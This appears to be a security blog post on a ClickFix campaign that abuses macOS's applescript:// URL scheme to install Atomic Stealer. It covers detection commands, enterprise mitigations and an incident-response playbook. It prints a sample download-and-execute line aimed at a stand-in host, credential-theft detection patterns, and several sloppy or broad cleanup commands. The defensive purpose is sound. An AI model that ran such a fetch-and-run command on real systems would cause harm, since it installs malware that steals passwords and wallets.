Listen to this Post
Introduction:
A newly refreshed ClickFix campaign has abandoned the traditional Terminal-based social engineering vector, instead abusing the `applescript://` URL scheme to silently deliver the Atomic Stealer payload to macOS users. By swapping the familiar “copy-paste into Terminal” ruse with an automatic launch of macOS Script Editor, attackers successfully sidestep Apple’s paste‑protection control introduced in macOS Tahoe 26.4 — while preserving the same deceptive “click‑to‑fix” pattern that has proven effective against unsuspecting Mac owners.
Learning Objectives:
- Understand the evolution of the ClickFix social engineering technique and how the `applescript://` URL scheme enables silent payload execution.
- Analyze the technical bypass of macOS 26.4 Terminal paste‑protection and identify indicators of Atomic Stealer compromise.
- Implement defensive measures, detection commands, and enterprise mitigation strategies against URI‑based macOS malware delivery.
You Should Know:
- Anatomy of the ClickFix Attack Chain (Script Editor Variant)
The attacker starts by hosting a fake support page or a “system cleanup” pop‑up, typically served via compromised websites or malvertising. Instead of instructing the user to copy a Terminal command, the page presents a button like “Run System Health Check” or “Fix Storage Issue” that triggers a malicious `applescript://` URL.
Step‑by‑step breakdown:
- Social engineering lure – The user sees a convincing alert: “Your Mac’s storage is critically low. Click below to run a quick cleanup.”
- URL scheme abuse – Clicking the button opens `applescript://` which, by default, invokes macOS Script Editor with a pre‑crafted AppleScript payload.
- Silent execution – Script Editor launches (often in the background or minimized) and executes commands such as:
do shell script "curl -o /tmp/update.zip http://malicious.domain/payload && unzip /tmp/update.zip -d /tmp && chmod +x /tmp/agent && /tmp/agent"
- Atomic Stealer deployment – The downloaded payload is the Atomic Stealer (also known as AMOS), which exfiltrates Keychain passwords, browser cookies, crypto wallets, and system information to a remote C2 server.
How to test and simulate (isolated lab only):
List registered URL handlers on macOS (requires Python or Swift) /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -dump URLSchemeBinding | grep -A2 "applescript" Check if Script Editor is the default handler defaults read com.apple.LaunchServices/com.apple.launchservices.secure LSHandlers | grep -A3 "applescript"
2. Bypassing macOS Tahoe 26.4’s Terminal Paste Protection
Apple’s new security control in macOS 26.4 scans commands pasted into Terminal and alerts the user if the command appears malicious or attempts to bypass Gatekeeper. However, the `applescript://` URL scheme never touches Terminal — it directly invokes Script Editor via the system’s URL dispatch mechanism.
Why this works:
- The paste‑protection only applies to `Terminal.app` pasteboard operations.
– `applescript://` is a registered URI scheme handled by Launch Services, which opens Script Editor without any paste event. - Script Editor then executes arbitrary shell commands via `do shell script` with the user’s own privileges.
Verification commands:
Monitor system logs for URL scheme invocation log stream --predicate 'eventMessage contains "applescript"' --debug Check if Script Editor has been used recently ls -la ~/Library/Containers/com.apple.ScriptEditor2/Data/Library/Saved\ Application\ State/
Windows/Linux parallel:
- Windows: `ms-settings:` or `ms-officecmd:` URI handlers can be abused similarly. Attackers might use `ms-settings:display` as a lure, but malicious `.lnk` or `ms-msdt` (now mostly patched) have been used in the past.
- Linux: `xdg-open` can handle custom URI schemes; a desktop entry with `x-scheme-handler/malicious` could be registered by a dropper.
3. Detecting Atomic Stealer Infections on macOS
After a successful ClickFix attack, Atomic Stealer leaves multiple artifacts. Use the following commands to hunt for indicators.
Process and file detection:
Look for suspicious processes named 'agent', 'update', 'java_update', or random alphanumeric names
ps aux | grep -E '(agent|update|java_update|/[a-zA-Z0-9]{8})' | grep -v grep
Check for recently downloaded ZIP files in /tmp
ls -la /tmp/.zip /tmp/.dmg 2>/dev/null
Find Atomic Stealer’s typical persistence (LaunchAgents)
launchctl list | grep -v com.apple | grep -E '(agent|updater|update)'
ls ~/Library/LaunchAgents/ | grep -E '(agent|plist)'
Network connections to known C2 patterns:
List active outbound connections (exclude system services)
lsof -i -P | grep ESTABLISHED | grep -v localhost | awk '{print $9}' | sort -u
Check for suspicious curl/wget commands in shell history
cat ~/.bash_history ~/.zsh_history 2>/dev/null | grep -E 'curl|wget' | grep -E '.(zip|dmg|sh)'
Keychain and browser extraction evidence:
Look for unexpected security command executions grep "security find-generic-password" ~/.bash_history ~/.zsh_history 2>/dev/null Monitor for mass access to browser cookie databases sudo fs_usage -w -f filesys | grep -E "(Cookies|Login Data|Keychain)"
4. Mitigation Strategies for Enterprises
Organizations can block the `applescript://` attack vector through configuration profiles, application restrictions, and user awareness.
Step‑by‑step enterprise hardening:
- Disable Script Editor entirely via MDM (e.g., Jamf, Kandji):
– Deploy a configuration profile that removes execute permissions:
`chmod 000 /Applications/Utilities/Script\ Editor.app`
- Or use Restriction payload: add `/Applications/Utilities/Script Editor.app` to the “Blacklisted Apps” list.
- Block the applescript:// URL scheme using a custom Content Filter or network proxy that inspects and blocks URI requests from web pages. On macOS, use `swcutil` or a
NEFilterDataProvider.
3. User education and simulated attacks:
- Train users to recognize fake system alerts and never click “Run” on unsolicited pop-ups.
- Run internal phishing campaigns that replicate the ClickFix pattern.
4. Enable Gatekeeper and Notarization strict mode:
sudo spctl --master-enable sudo spctl --assess --verbose /tmp/downloaded_app
Windows equivalent:
Block `ms-officecmd:` or `search-ms:` URI handlers via Group Policy (User Config > Administrative Templates > Windows Components > File Explorer > Turn off URI handlers).
- Incident Response Steps for a Confirmed Atomic Stealer Compromise
If a user reports seeing Script Editor open unexpectedly or experiences unusual system behavior, follow this IR playbook.
Immediate containment:
Kill the Atomic Stealer process (example PID, replace with actual) sudo kill -9 $(pgrep -f "agent|update") Remove downloaded payloads sudo rm -rf /tmp/update.zip /tmp/agent /tmp/java_update Isolate the machine from network sudo pfctl -e -f /etc/pf.conf (if a block-all rule is preconfigured)
Eradication:
Remove persistence LaunchAgents
launchctl unload ~/Library/LaunchAgents/com.apple.updater.plist
rm ~/Library/LaunchAgents/com.apple.updater.plist
Check and clean cron jobs
crontab -l | grep -v "unknown" > clean_cron && crontab clean_cron
Reset affected browser profiles (after extracting necessary data)
rm -rf ~/Library/Application\ Support/Google/Chrome/Default/{Cookies,Login\ Data,Web\ Data}
Recovery and monitoring:
- Rotate all credentials stored in Keychain (advise user to change passwords).
- Use `sysdiagnose` to collect full system snapshot for further analysis:
`sudo sysdiagnose -f ~/Desktop/ -b`
- Monitor outbound traffic for exfiltration patterns for at least 30 days.
6. Hardening macOS Against URI Scheme Abuse
Admins and advanced users can proactively audit and restrict dangerous URL handlers.
List all registered URI schemes and their handlers:
Using lsregister (as shown earlier) /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -dump URLSchemeBinding | grep -E "(Scheme:|HandlerBundle)" | paste - - | column -t
Remove or override the applescript:// handler:
Create a dummy app that does nothing and register it as handler mkdir -p /tmp/DummyHandler.app/Contents/MacOS echo '!/bin/bash' > /tmp/DummyHandler.app/Contents/MacOS/DummyHandler echo 'exit 0' >> /tmp/DummyHandler.app/Contents/MacOS/DummyHandler chmod +x /tmp/DummyHandler.app/Contents/MacOS/DummyHandler Register it (requires temporary entitlement, may need SIP disabled for production) /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /tmp/DummyHandler.app
Note: Modifying core URL handlers may affect legitimate AppleScript usage. For most environments, blocking Script Editor execution is more practical.
7. What Undercode Say
- Key Takeaway 1: Attackers are rapidly adapting to OS‑level security improvements; the shift from Terminal to Script Editor shows how a simple URI scheme can neutralize paste‑protection in one macOS release cycle.
- Key Takeaway 2: Social engineering remains the most effective delivery mechanism — technical controls like URL scheme restrictions and application whitelisting must be paired with user awareness to break the ClickFix attack chain.
Analysis: The macOS ecosystem has long relied on the assumption that users will not execute arbitrary code from untrusted sources. However, the `applescript://` abuse demonstrates that even “benign” URL handlers can become potent vectors when combined with convincing lures. Enterprises using macOS must now treat Script Editor and other scripting utilities as high‑risk applications, similar to how PowerShell is treated on Windows. Moreover, Apple’s paste‑protection, while well‑intentioned, inadvertently pushed adversaries to discover an even more seamless execution method. Future mitigations should include user prompts when any URI scheme attempts to execute shell commands, or a system‑wide “allow‑list only” policy for URL handlers invoked from web content. Until then, defenders must rely on behavioral detection (e.g., monitoring for `do shell script` calls from Script Editor) and strict application control.
Prediction:
Within the next 12 months, we will see a surge in macOS malware campaigns abusing other registered URL schemes — including x-apple.systempreferences, itms-apps, and custom application handlers — to bypass security controls. Apple will likely respond by introducing a “URI scheme permission” model similar to iOS, where web pages must request explicit user consent before launching local applications. Until then, macOS will remain a fertile ground for social engineering attacks that exploit the trust users place in system dialogs and URL‑based interactions.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mayura Kathiresh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
